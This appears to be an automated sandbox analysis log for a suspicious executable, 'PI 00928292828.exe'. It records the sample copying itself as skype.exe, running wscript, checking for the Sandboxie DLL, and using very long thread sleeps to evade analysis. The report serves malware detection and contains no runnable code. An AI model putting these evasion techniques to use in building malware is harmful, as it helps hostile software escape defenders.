Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skype.exe PID: 7600, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PI 00928292828.exe, 00000000.00000002.1691908965.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1837219390.00000000031F5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\PI 00928292828.exe	Memory allocated: 3160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Memory allocated: 32D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Memory allocated: 52D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Memory allocated: EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Memory allocated: 2B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Memory allocated: 2940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Memory allocated: 1640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Memory allocated: 3180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Memory allocated: 3090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Memory allocated: A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Memory allocated: 27C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Memory allocated: 2570000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe	Window / User API: threadDelayed 2263	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Window / User API: threadDelayed 4783	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Window / User API: threadDelayed 1402	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Window / User API: threadDelayed 5871	Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7560	Thread sleep count: 2263 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -99859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7560	Thread sleep count: 4783 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -99746s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -99563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -99418s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -99310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -99168s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -99055s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -98766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -98328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -98203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -98094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -97979s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -97875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -97754s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -97625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -97516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -97391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -97281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -97171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -97062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -96948s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -96842s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -96734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -96625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -96515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -96406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -96293s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -96186s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -96078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -95968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -95849s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -95719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -95453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -95328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -95218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -95109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -95000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe TID: 7548	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -99884s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8048	Thread sleep count: 1402 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8048	Thread sleep count: 5871 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -99774s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -99665s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -99556s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -99446s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -99337s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -99227s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -99117s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -99009s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -98899s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -98790s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -98681s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -98569s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -98462s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -98352s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -98243s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -98134s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -98024s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -97909s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -97790s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -97681s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -97571s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -97462s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -97352s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -97243s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -97134s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -97024s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -96898s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -96790s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -96681s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -96571s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -96462s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -96352s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -96243s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -96131s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe TID: 8044	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 99859	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 99746	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 99563	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 99418	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 99310	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 99168	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 99055	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 98766	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 98203	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 98094	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 97979	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 97875	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 97754	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 97625	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 97516	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 97391	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 97281	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 97171	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 97062	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 96948	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 96842	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 96734	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 96625	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 96515	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 96406	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 96293	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 96186	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 96078	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 95968	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 95849	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 95719	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 95453	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 95328	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 95218	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 95109	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 95000	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 99884	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 99774	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 99665	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 99556	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 99446	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 99337	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 99227	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 99117	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 99009	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 98899	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 98790	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 98681	Jump to behavior
